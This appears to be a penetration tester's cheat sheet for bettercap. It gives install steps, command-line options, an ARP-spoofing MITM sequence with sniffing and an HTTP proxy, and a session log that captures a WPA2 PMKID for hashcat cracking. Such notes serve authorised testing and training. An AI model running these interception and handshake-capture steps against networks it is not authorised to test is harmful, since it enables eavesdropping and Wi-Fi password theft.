The Swiss Army knife for WiFi, Bluetooth Low Energy, wireless HID hijacking and Ethernet networks reconnaissance and MITM attacks.


Download newest release from

Install requirements

sudo apt update && sudo apt install build-essential libpcap-dev net-tools libnetfilter-queue-dev

Unzip newest release and move to

sudo cp bettercap /usr/local/bin

Install caplet updates and UI, default credentials user:pass

sudo bettercap -eval "caplets.update; ui.update; quit"


sudo bettercap [OPTIONS]


Usage of bettercap:
  -autostart string
        Comma separated list of modules to auto start. (default "")
  -caplet string
        Read commands from this file and execute them in the interactive session.
  -cpu-profile file
        Write cpu profile file.
        Print debug messages.
  -env-file string
        Load environment variables from this file if found, set to empty to disable environment persistence.
  -eval string
        Run one or more commands separated by ; in the interactive session, used to set variables via command line.
  -gateway-override string
        Use the provided IP address instead of the default gateway. If not specified or invalid, the default gateway will be used.
  -iface string
        Network interface to bind to, if empty the default interface will be auto selected.
  -mem-profile file
        Write memory profile to file.
        Disable output color effects.
        Disable interactive session history file.
        Suppress all logs which are not errors.
        Print the version and exit.


Start on active network interface

sudo bettercap

Start on specific network interface

sudo bettercap -iface <interface>

ARP spoofing

sudo bettercap
net.probe on
net.sniff on
http.proxy on
set arp.spoof.fullduplex true
arp.spoof on

Use caplets

sudo bettercap -caplet http-ui

Local network recon

sudo bettercap


Wi-Fi network recon

sudo bettercap -iface <wifi-interface>


Capturing PMKIDs

This can also be done by the hcxdumptool

bettercap v2.31.0 (built for linux arm with go1.16.2) [type 'help' for a list of commands]

 mon0  » wifi.recon on
[01:52:35] [sys.log] [inf] wifi using interface mon0 (b8:27:eb:63:d9:2e)
 mon0  » [01:52:35] [sys.log] [inf] wifi started (min rssi: -200 dBm)
 mon0  » [01:52:35] [sys.log] [inf] wifi channel hopper started.
 mon0  » [01:52:35] [] wifi access point OFFSEC-G (-66 dBm) detected as c8:12:34:56:78:e1 (Hewlett Packard Enterprise).

 mon0  » wifi.assoc c8:12:34:56:78:e1
 mon0  » [01:52:59] [sys.log] [inf] wifi sending association request to AP OFFSEC-G (channel:11 encryption:WPA2)
 mon0  » [01:52:59] [sys.log] [war] wifi error while hopping to channel 12: iw: out= err=exit status 234
 mon0  » [01:52:59] [wifi.client.handshake] captured b8:12:34:56:78:2e -> OFFSEC-G (c8:12:34:56:78:e1) RSN PMKID to /root/bettercap-wifi-handshakes.pcap

The /root/bettercap-wifi-handshakes.pcap file can be converted with hcxpcapngtool to hashcat format.


libpcap not found

sudo ln -s /usr/lib/x86_64-linux-gnu/ /usr/lib/x86_64-linux-gnu/

Kali web-ui 404-error

cp -r /usr/local/share/bettercap/ui/ /usr/share/bettercap/ui/

Kali web-ui 404-error Raspberry Pi

Download newest release:
unzip -d /usr/share/bettercap/

Filter IP’s from Bettercap output

grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" bettercap.log | sort -u > ip.txt

URL List